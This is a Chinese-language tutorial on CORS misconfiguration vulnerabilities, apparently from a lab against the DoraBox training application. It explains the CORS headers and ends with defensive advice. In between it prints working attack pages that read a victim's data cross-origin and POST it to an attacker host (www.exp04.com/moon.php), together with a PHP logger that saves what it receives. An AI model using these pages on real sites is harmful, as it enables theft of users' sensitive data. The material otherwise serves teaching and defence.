CORS 跨域资源共享漏洞

1 cors 跨域资源共享

跨域资源共享(CORS)是一种放宽同源策略的机制，它允许浏览器向跨源服务器，发出 XMLHttpRequest 请求，从而克服了 AJAX 只能同源使用的限制，以使不同的网站可以跨域获取数据。

我们先来简单分析一下 CORS 跨域获取资源的过程：

CORS 定义了两种跨域请求：简单请求 和 非简单请求。简单跨域请求就是使用设定的请求方式请求数据，而非简单跨域请求则是在使用设定的请求方式请求数据之前，先发送一个 OPTIONS 预检请求，验证请求源是否为服务端允许源。只有"预检"通过后才会再发送一次请求用于数据传输。

当我们需要发送一个跨域请求的时候，浏览器会首先检查这个请求，如果它是简单跨域请求，浏览器就会立刻发送这个请求。如果它是非简单跨域请求，这时候浏览器不会马上发送这个请求，而是有一个跟服务器预检验证的过程。

CORS 运行机制：

在浏览器进行请求时，自动在请求头中添加 Origin 字段，

服务端通过验证 Origin 字段来判断请求是否被允许，从而实现浏览器进行跨源访问

CORS 漏洞：

浏览器自动在 Http 请求头加上 Origin 字段，服务器通过判断 Origin 字段的值来判断 请求是否可以读取本站资源。

跨域的字典解释

Access-Control-Allow-Origin：该字段是必须的。它的值要么是请求时 Origin 字段的值，要么是一个*，表示接受任意域名的请求。

Access-Control-Allow-Credentials：该字段可选。它的值是一个布尔值，表示是否允许发送 Cookie。默认情况下，Cookie 不包括在 CORS 请求之中。当设置为 true 时，即表示服务器明确许可，Cookie 可以包含在请求中，一起发给服务器。这个值也只能设为 true，如果服务器不要浏览器发送 Cookie，删除该字段即可

Access-Control-Expose-Headers ： 该 字 段 可 选 。 CORS 请 求 时 ， XMLHttpRequest 对 象 的getResponseHeader()方法只能拿到 6 个基本字段：Cache-Control、Content-Language、Content-Type、Expires、Last-Modified、Pragma。如果想拿到其他字段，就必须在 Access-Control-Expose-Headers 里面指定。

2 CORS 漏洞解析

访问这页面查看网络 Access-Control-Allow-Origin 设置为* 所有域名可以请求本站资源

Access-Control-Allow-Credentials: true 这个是的时候可以允许带有 cookie 访问

3 cors 跨域资源漏洞攻击

攻击代码

cors.html

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Cors</title>
</head>
<body>
<script>
function cors() {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if(xhr.readyState == 4){
alert(xhr.responseText);
}
}
// xhr.= twithCredentials rue;
xhr.open("GET",'http://192.168.135.133/DoraBox/csrf/userinfo.php');
xhr.send();
}
cors();
</script>
</body>
</html>

把构造好的恶意代码搭建在远程服务上，让受害者进行访问，即可获取受害者的敏感信息。

查看结果

4 CORS 跨域资源共享攻击利用

首先在远程服务器上准备记录代码

moon.php

<?php
$data = $_POST['moon'];
if($data){
    $myfile = fopen("data.html","w");
    fwrite($myfile,$data);
    fclose($myfile);
}

core-exp.html

构造恶意代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Cors-exp</title>
</head>
<body>
<script>
    function cors() {
    var xhr = new XMLHttpRequest();
    var xhr1 = new XMLHttpRequest();
    xhr.onreadystatechange = function () {
        if(xhr.readyState == 4){
            alert(xhr.responseText)
            var data = xhr.responseText;
            xhr1.open("POST","http://www.exp04.com/moon.php",true);
            xhr1.setRequestHeader("Content-type","application/x-www-form-urlencoded");
            alert(data);
            xhr1.send("moon="+escape(data));
            // body = document.getElementsByTagName('body')
            // body[0].innerHTML = xhr.responseText;
            }
        }
        //xhr.withCredentials = true;
        xhr.open("GET",'http://192.168.135.133/DoraBox/csrf/userinfo.php');
        xhr.send();
        }
    cors();
</script>
</body>
</html>

当受害者浏览器此页面时，就会访问敏感信息，会把敏感信息发送到远程服务器上

查看结果

5 防御方案

1.不要配置"Access-Control-Allow-Origin" 为通配符“*”,而且更重要的是，要严格效验来自请求数据包中的"Origin" 的值。当收到跨域请求的时候，要检查"Origin" 的值是否是一个可信的源， 还要检查是否为 null

2.避免使用"Access-Control-Allow-Credentials: true"

3.减少 Access-Control- Allow-Methods 所允许的方法